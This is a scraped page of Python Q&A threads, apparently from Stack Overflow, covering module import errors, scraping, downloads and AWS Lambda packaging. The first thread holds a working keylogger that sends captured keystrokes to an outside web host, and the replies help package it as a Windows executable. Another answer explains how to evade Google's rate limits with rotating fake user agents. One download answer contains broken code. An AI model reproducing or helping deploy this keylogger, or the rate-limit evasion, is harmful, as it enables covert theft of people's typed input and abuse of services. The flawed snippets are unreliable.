No module requests found exe Window 10 - python

When I convert this code with pyinstaller and run it as a exe in a window 10 vm it printed this error.
import pynput
import requests
import json
key_count = 0
keys = []
def on_press(key):
global key_count
global keys
keys.append(str(key))
key_count += 1
if key_count >= 10:
key_count = 0
send_keys()
def send_keys():
data = json.dumps({'key_data': ''.join(keys)})
headers = {'Content-type': 'application/json'}
keys.clear()
url = 'https://000webhostapp.com/dog.php'
try:
response = requests.post(url, data=data, headers=headers)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Error: {e}')
else:
print('Data sent successfully')
with pynput.keyboard.Listener(on_press=on_press) as listener:
listener.join()
enter image description here
Need help Thank you in advance
I try to force to convert the python code with command to include the module but didnt work I dont know what to do.
Thank you

as far as I see from what you said, you are not using any virtualenv. You installed python directly on your computer and started using the script.
The Requests library is not one of the libraries that come with python by default.
To install;
python -m pip install requests
"What is virtualenv and how to use it?" To find an answer to the question with the example of the requests library;
https://docs.python-guide.org/dev/virtualenvs/

I already tried your command but it does the same error. I used this code to convert the .py
pyinstaller --onefile your_script_name.py
Thank you :)

Related

adding fake_useragent to people_also_ask module

I want to scrape google 'people also ask questions/answer'. I am doing it successfully with the following module.
pip install people_also_ask
The problem is the library is configured such that no one can send many requests to google. I want to send 1000 requests per day and to achieve that I have to add fake_useragent to module. I tried a lot but when I try to add fake user agent to header it gives error. I am not a pro so I must have done wrong myself. Can anyone help me add fake_useragent to module(people_also_ask). here is working code to get question/answer.
from encodings import utf_8
import people_also_ask as paa
from fake_useragent import UserAgent
ua = UserAgent()
while True:
input("Please make sure the queries are in \\query.txt file.\npress Enter to continue...")
try:
query_file = open("query.txt","r")
queries = query_file.readlines()
query_file.close()
break
except:
print("Error with the query.txt file...")
for query in queries:
res_file = open("result.csv","a",encoding="utf_8")
try:
query = query.replace("\n","")
except:
pass
print(f'Searching for "{query}"')
questions = paa.get_related_questions(query, 14)
questions.insert(0,query)
print("\n________________________\n")
main_q = True
for i in questions:
i = i.split('?')[0]
try:
answer = str(paa.get_answer(i)['response'])
if answer[-1].isdigit():
answer = answer[:-11]
print(f"Question:{i}?")
except Exception as e:
print(e)
print(f"Answer:{answer}")
if main_q:
a = ""
b = ""
main_q = False
else:
a = "<h2>"
b = "</h2>"
res_file.writelines(str(f'{a}{i}?{b},"<p>{answer}</p>",'))
print("______________________")
print("______________________")
res_file.writelines("\n")
res_file.close()
print("\nSearch Complete.")
input("Press any key to Exit!")
This is against Google's terms of service, and the wishes of the people_also_ask package. This answer is for educational purposes only.
You asked why fake_useragent is prevented from working. It's not prevented from working, but the people_also_ask package simply isn't implementing any calls to make use of any fake_useragent methods. You can't just import a package and expect another package to start using it. You manually have to make packages work together.
To do that, you have to have some idea of how the 2 packages work. Have a look at the source code and you will see you can make them work together very easily. Just substitute the constant header in people_also_ask with one generated by fake_useragent before you request any data.
paa.google.HEADERS = {'User-Agent': ua.random} # replace the HEADER with a randomised HEADER from fake_useragent
questions = paa.get_related_questions(query, 14)
and
paa.google.HEADERS = {'User-Agent': ua.random} # replace the HEADER with a randomised HEADER from fake_useragent
answer = str(paa.get_answer(i)['response'])
NOTE:
Not all user agents will work. Google doesn't give related questions depending on the user agent. It is not the fault of either the fake_useragent, or the people_also_ask package.
In order to alleviate this issue somewhat, make sure you call ua.update() and you can also use PR #122 of fake_useragents to only select a subset of the newest user agents which are more likely to work, though you will still get a few missed queries. There is a reason the people_also_ask package didn't bypass or work-around this limitation from google

Error download when using python Wget lib

Is there a way to restart the download if the download get stuck at XX%? I'm trying to do scraping and download quite a lot of files. I'm using the below code. It will solve connection error, but it won't restart any download if it get stuck.
for element in elements:
for attempt in range(100):
try:
wget.download(element.get_attribute("href"), path)
except:
print("attempt error, retry" + str(attempt))
else:
break
Seems there is no feature to restart the download. I looked at many examples of this package -> https://www.programcreek.com/python/example/83386/wget.download. The page for the manual is gone and the pypi.org page does have have any info about a feature like this.
However, you can restart the download simply by adding another line to the except. This code will work for you.
# Set some variables to end loop after download success
# The download loop will exit if failed 5 times
downloaded = False
attempts = 0
for element in elements:
while not downloaded and attempts < 5:
try:
wget.download(element.get_attribute("href"), path)
# Set downloaded flag to end loop
downloaded = True
except:
print("attempt error, retry" + str(attempt))
wget.download(element.get_attribute("href"), path)
attempts += 1
Another approach it to use requests library which is more popular.
import requests
def proceed_files():
# Set some variables to end loop after download success
# The download loop will exit if failed 5 times
file_urls = ['list', 'of', 'file urls']
for url in file_urls:
downloaded = False
attempts = 0
while not downloaded and attempts < 5:
if download_file(url):
downloaded = True
else:
attempts += 1
def download_file(url):
try:
request = requests.get(url, allow_redirects=True)
file_name = url.split('/')[:-1]
open(file_name, 'wb').write(request.content)
return True
except:
return False

Module urllib.request not getting data

I am trying to test this demo program from lynda using Python 3. I am using Pycharm as my IDE. I already added and installed the request package, but when I run the program, it runs cleanly and shows a message "Process finished with exit code 0", but does not show any output from print statement. Where am I going wrong ?
import urllib.request # instead of urllib2 like in Python 2.7
import json
def printResults(data):
# Use the json module to load the string data into a dictionary
theJSON = json.loads(data)
# now we can access the contents of the JSON like any other Python object
if "title" in theJSON["metadata"]:
print(theJSON["metadata"]["title"])
# output the number of events, plus the magnitude and each event name
count = theJSON["metadata"]["count"];
print(str(count) + " events recorded")
# for each event, print the place where it occurred
for i in theJSON["features"]:
print(i["properties"]["place"])
# print the events that only have a magnitude greater than 4
for i in theJSON["features"]:
if i["properties"]["mag"] >= 4.0:
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"])
# print only the events where at least 1 person reported feeling something
print("Events that were felt:")
for i in theJSON["features"]:
feltReports = i["properties"]["felt"]
if feltReports != None:
if feltReports > 0:
print("%2.1f" % i["properties"]["mag"], i["properties"]["place"], " reported " + str(feltReports) + " times")
# Open the URL and read the data
urlData = "http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
webUrl = urllib.request.urlopen(urlData)
print(webUrl.getcode())
if webUrl.getcode() == 200:
data = webUrl.read()
data = data.decode("utf-8") # in Python 3.x we need to explicitly decode the response to a string
# print out our customized results
printResults(data)
else:
print("Received an error from server, cannot retrieve results " + str(webUrl.getcode()))
Not sure if you left this out on purpose, but this script isn't actually executing any code beyond the imports and function definition. Assuming you didn't leave it out on purpose, you would need the following at the end of your file.
if __name__ == '__main__':
data = "" # your data
printResults(data)
The check on __name__ equaling "__main__" is just so your code is only executing when the file is explicitly run. To always run your printResults(data) function when the file is accessed (like, say, if its imported into another module) you could just call it at the bottom of your file like so:
data = "" # your data
printResults(data)
I had to restart the IDE after installing the module. I just realized and tried it now with "Run as Admin". Strangely seems to work now.But not sure if it was a temp error, since even without restart, it was able to detect the module and its methods.
Your comments re: having to restart your IDE makes me think that pycharm might not automatically detect newly installed python packages. This SO answer seems to offer a solution.
SO answer

python lambda can't detect packaged modules

I'm trying to create a lambda function by uploading a zip file with a single .py file at the root and 2 folders which contain the requests lib downloaded via pip.
Running the code local works file. When I zip and upload the code I very often get this error:
Unable to import module 'main': No module named requests
Sometimes I do manage to fix this, but its inconsistent and I'm not sure how I'm doing it. I'm using the following command:
in root dir zip -r upload.zip *
This is how I'm importing requests:
import requests
FYI:
1. I have attempted a number of different import methods using the exact path which have failed so I wonder if thats the problem?
2. Every time this has failed and I've been able to make it work in lambda, its involved a lot of fiddling with the zip command as I thought the problem was I was zipping the contents incorrect and hiding them behind an extra parent folder.
Looking forward to seeing the silly mistake i've been making!
Adding code snippet:
import json ##Built In
import requests ##Packaged with
import sys ##Built In
def lambda_function(event, context):
alias = event['alias']
message = event['message']
input_type = event['input_type']
if input_type == "username":
username = alias
elif input_type == "email":
username = alias.split('#',1)[0]
elif input_type is None:
print "input_type 'username' or 'email' required. Closing..."
sys.exit()
payload = {
"text": message,
"channel": "#" + username,
"icon_emoji": "<an emoji>",
"username": "<an alias>"
}
r = requests.post("<slackurl>",json=payload)
print(r.status_code, r.reason)
I got some help outside the stackoverflow loop and this seems to consistently work.
zip -r upload.zip main.py requests requests-2.9.1.dist-info

Weird json value urllib python

I'm trying to manipulate a dynamic JSON from this site:
http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do
It has 3 elements, imagem, a base64, labelValorCaptcha, just a message, and uuidCaptcha, a value to pass by parameter to play a sound in this link bellow:
http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha=sajcaptcha_e7b072e1fce5493cbdc46c9e4738ab8a
When I enter in the first site through a browser and put in the second link the uuidCaptha after the equal ("..uuidCaptcha="), the sound plays normally. I wrote a simple code to catch this elements.
import urllib, json
url = "http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do"
response = urllib.urlopen(url)
data = json.loads(response.read())
urlSound = "http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha="
print urlSound + data['uuidCaptcha']
But I dont know what's happening, the caught value of the uuidCaptcha doesn't work. Open a error web page.
Someone knows?
Thanks!
It works for me.
$ cat a.py
#!/usr/bin/env python
# encoding: utf-8
import urllib, json
url = "http://esaj.tjsc.jus.br/cposgtj/imagemCaptcha.do"
response = urllib.urlopen(url)
data = json.loads(response.read())
urlSound = "http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha="
print urlSound + data['uuidCaptcha']
$ python a.py
http://esaj.tjsc.jus.br/cposgtj/somCaptcha.do?timestamp=1455996420264&uuidCaptcha=sajcaptcha_efc8d4bc3bdb428eab8370c4e04ab42c
As I said #Charlie Harding, the best way is download the page and get the JSON values, because this JSON is dynamic and need an opened web link to exist.
More info here.

Categories